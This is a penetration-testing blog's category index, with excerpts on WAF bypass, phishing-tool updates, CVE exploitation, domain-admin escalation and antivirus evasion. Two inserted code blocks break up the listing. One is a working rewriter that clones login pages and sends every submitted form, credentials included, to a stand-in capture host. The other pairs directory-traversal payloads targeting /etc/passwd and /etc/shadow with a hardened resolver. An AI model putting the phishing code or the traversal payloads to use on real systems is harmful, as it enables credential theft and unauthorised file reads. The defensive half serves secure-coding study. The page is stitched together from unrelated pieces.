Category: Penetration Testing
-
Automate WAF Bypass with Burp
I read an article from a Fortify security researcher earlier this week that provided a very simple and effective way to bypass some Web Application Firewalls (WAFs). The article can be found here. After reading, I updated my Burp configuration to automatically take advantage of this flaw in design and thought I would share the…
-
Gophishing Update – Enhanced Clickthrough and More
I’ve released a new version of Gophish.py. The update includes: fixed a bug in rewriting the method attribute in phished forms; fixed a bug with GET-based forms; fixed a bug in the autofill option, and fixed the demo/sample file accordingly; fixed a bug where links were rewritten when using ‘javascript:…’; fixed some bugs regarding correctly…
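The three form-handling fixes listed above (method attribute, GET-based forms, ‘javascript:’ links) all come down to one rewriting pass over a cloned login page. The block below is an added example written for this page, not Gophish.py’s own code: it uses only the standard library’s html.parser (the real tool uses BeautifulSoup), the sample page, the victim/capture URLs and the `data-orig-method` attribute are all my own constructed assumptions, and it shows the behaviour a correct rewriter needs: every form posts to the capture endpoint, a GET form is forced to POST so credentials never land in a URL or Referer, and `javascript:`/`mailto:`/`#` targets are left untouched while relative links and resources are made absolute against the original site so the clone still renders.

```python
"""Added example (not Gophish.py): rewrite forms in a cloned page with stdlib only."""
from html.parser import HTMLParser
from urllib.parse import urljoin

# URL values that must never be absolutised or redirected (assumption: this list).
_SKIP_PREFIXES = ("javascript:", "mailto:", "tel:", "data:", "#")
# Attributes that carry URLs worth absolutising so the clone still loads.
_URL_ATTRS = {"href", "src"}


def should_rewrite(url):
    """True if a URL attribute should be made absolute against the base page."""
    u = url.strip().lower()
    return bool(u) and not u.startswith(_SKIP_PREFIXES)


class FormRewriter(HTMLParser):
    """Re-emit the HTML, pointing every <form> at capture_url (POST)."""

    def __init__(self, base_url, capture_url):
        super().__init__(convert_charrefs=False)  # keep entities as written
        self.base_url = base_url
        self.capture_url = capture_url
        self.out = []
        self.forms = 0

    def _emit_tag(self, tag, attrs, selfclosing=False):
        parts = [tag]
        for name, value in attrs:
            if value is None:
                parts.append(name)
            else:
                esc = value.replace("&", "&amp;").replace('"', "&quot;")
                parts.append('%s="%s"' % (name, esc))
        self.out.append("<%s%s>" % (" ".join(parts), " /" if selfclosing else ""))

    def _rewrite_attrs(self, tag, attrs):
        attrs = list(attrs)
        if tag == "form":
            self.forms += 1
            # Remember the original verb (GET forms were the buggy case) in a
            # hypothetical data attribute so the capture backend can replay it,
            # then force POST so credentials never appear in a URL or Referer.
            orig = next((v for n, v in attrs if n == "method"), None) or "get"
            attrs = [(n, v) for n, v in attrs if n not in ("action", "method")]
            attrs += [("action", self.capture_url), ("method", "post"),
                      ("data-orig-method", orig.lower())]
            return attrs
        result = []
        for name, value in attrs:
            if name in _URL_ATTRS and value is not None and should_rewrite(value):
                value = urljoin(self.base_url, value)  # relative -> absolute
            result.append((name, value))
        return result

    def handle_starttag(self, tag, attrs):
        self._emit_tag(tag, self._rewrite_attrs(tag, attrs))

    def handle_startendtag(self, tag, attrs):
        self._emit_tag(tag, self._rewrite_attrs(tag, attrs), selfclosing=True)

    def handle_endtag(self, tag):
        self.out.append("</%s>" % tag)

    def handle_data(self, data):
        self.out.append(data)

    def handle_entityref(self, name):
        self.out.append("&%s;" % name)

    def handle_charref(self, name):
        self.out.append("&#%s;" % name)

    def handle_comment(self, data):
        self.out.append("<!--%s-->" % data)

    def handle_decl(self, decl):
        self.out.append("<!%s>" % decl)


def rewrite_page(html, base_url, capture_url):
    """Return the rewritten page; base_url is the page the clone was taken from."""
    p = FormRewriter(base_url, capture_url)
    p.feed(html)
    p.close()
    return "".join(p.out)


# Constructed sample page: a GET login form, a relative link and a javascript: link.
SAMPLE_PAGE = """<html><body>
<a href="javascript:void(0)">toggle</a>
<a href="/help">help</a>
<img src="img/logo.png">
<form action="/login" method="GET"><input name="user"><input type="password" name="pass">
<input type="submit"></form>
</body></html>"""

if __name__ == "__main__":
    print(rewrite_page(SAMPLE_PAGE, "https://victim.example/login",
                       "https://phish.example/capture"))
```

Running it prints the page with `action="https://phish.example/capture" method="post"` on the form, `href="https://victim.example/help"` and `src="https://victim.example/img/logo.png"` absolutised, and the `javascript:void(0)` link unchanged.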
-
Manually Penetrating the Ektron Vulnerability – CVE-2012-5357
My posts are a little bit out of order here in that this was one of the first vulnerabilities that I came across in which the Metasploit modules failed due to a combination of DEP and AV. The result was researching AV bypass techniques that I began discussing here, and then here, and then figuring…
Josh Berry
-
GoPhishing Update – Clickthrough and Redirection Support
I’ve released a new version of Gophish.py. The update includes: added comments explaining my ugly code; cleaned up some code with a function, removing some redundancy; some bug fixes. The main fix is for an issue I found in certain cases when running it on Linux. Sometimes BeautifulSoup would change the order of the HTML…
-
Directory Traversal to Root
I’ve had some success in the past when finding directory traversal vulnerabilities on Linux/Unix hosts and thought I would share a little post on what I’ve found. The vulnerabilities are often found in the unauthenticated portions (convenient) of management applications such as Webmin or ColdFusion and are frequently running with elevated privileges. The first step…
Josh Berry
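To make concrete what “directory traversal in an unauthenticated file endpoint running as root” looks like, here is an added example that is not code from the post: a minimal static-file resolver in the vulnerable form such bugs usually take, beside a hardened version with the containment check a reviewer would ask for. The document root, the request paths and the probe helper are all hypothetical and constructed for this example; it is pure path arithmetic (posixpath, so results are the same on any OS) and touches no real files.

```python
"""Added example: vulnerable vs hardened path resolution for a file endpoint."""
import posixpath
from urllib.parse import unquote

DOC_ROOT = "/var/www/app/static"  # hypothetical document root


def resolve_vulnerable(request_path):
    """The bug: URL-decode the path and join it onto DOC_ROOT with no containment
    check. '../' walks out of DOC_ROOT, and when the daemon runs as root the
    result is an arbitrary file read (/etc/shadow, private keys, config)."""
    decoded = unquote(request_path)          # %2e%2e%2f -> ../
    return posixpath.normpath(posixpath.join(DOC_ROOT, decoded))


def resolve_hardened(request_path):
    """Same lookup with the missing checks added."""
    decoded = unquote(request_path)
    if "\x00" in decoded:                    # NUL truncation in C-backed file APIs
        raise PermissionError("NUL byte in path")
    # A leading '/' would make join() discard DOC_ROOT entirely, so strip it.
    candidate = posixpath.normpath(posixpath.join(DOC_ROOT, decoded.lstrip("/")))
    # Containment check on the normalised path. On a live server also run
    # os.path.realpath() first so a symlink inside DOC_ROOT cannot point outside.
    if posixpath.commonpath([DOC_ROOT, candidate]) != DOC_ROOT:
        raise PermissionError("path escapes document root: %r" % request_path)
    return candidate


def probe(request_path):
    """What a tester sees for one payload against both resolvers."""
    try:
        hardened = resolve_hardened(request_path)
    except PermissionError as exc:
        hardened = "BLOCKED (%s)" % exc
    return {"payload": request_path,
            "vulnerable": resolve_vulnerable(request_path),
            "hardened": hardened}


# Constructed payloads a tester would send to an unauthenticated file endpoint.
PAYLOADS = [
    "css/site.css",                             # legitimate request
    "../../../../etc/passwd",                   # plain traversal
    "%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/shadow",   # URL-encoded dots
    "/etc/passwd",                              # absolute path swallows DOC_ROOT in join()
]

if __name__ == "__main__":
    for p in PAYLOADS:
        r = probe(p)
        print("%-42s vulnerable=%-30s hardened=%s"
              % (r["payload"], r["vulnerable"], r["hardened"]))
```

The two things to take from the output are that every escaping payload resolves to a real system path on the vulnerable side (which is why finding this in a root-owned Webmin or ColdFusion component is effectively a read of any file on the box), and that the hardened resolver accepts only paths whose normalised form still sits under DOC_ROOT.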
-
Follow Up on SYSTEM to Domain Admin Post
I learned a few new things and made a few updates to my script after the last post that I thought I would share. First things first, someone commented on the article on another site and mentioned that the Metasploit module auxiliary/scanner/smb/smb_enumusers_domain provides the same functionality over SMB by calling the Windows NetWkstaUserEnum function. Example…
-
SYSTEM to Domain Admin – Technique One
Today I am going to give a quick overview of one of my favorite ways to escalate from SYSTEM level privileges on a single host to domain admin level and more on a Windows network. There are many ways and techniques to accomplish jumping from SYSTEM to domain admin; this just happens to be one…
Josh Berry
-
Manually Penetrating the FCKedit Vulnerability – CVE-2009-2265
I am seeing more and more scenarios where, for whatever reason, the Metasploit modules and modules from commercial solutions I use aren’t successful against a known vulnerable host. This is often due to DEP or antivirus protections that I discussed here and again here. There can also be other security mechanisms at play from time…
Josh Berry
-
CodeWatch Update – 12/4/2013
This weekend I made the first updates to CodeWatch since releasing it as a free service and am just now getting around to posting a notification. The updates included: Minor bugfixes throughout the system. Upgrades to the Brakeman scanner for Ruby on Rails vulnerability testing. We were using an outdated version but are now (at…
-
Follow Up on DEP and AV Bypass
This is a continuation of research based on my adventures on a penetration testing engagement described here. There were a few key features that I really wanted to add to enhance my DEP/AV bypass tool: bypass a majority of AV systems; remove the dependency on the msvcr100d.dll file; combine the Metasploit payload in the shellcodeexec…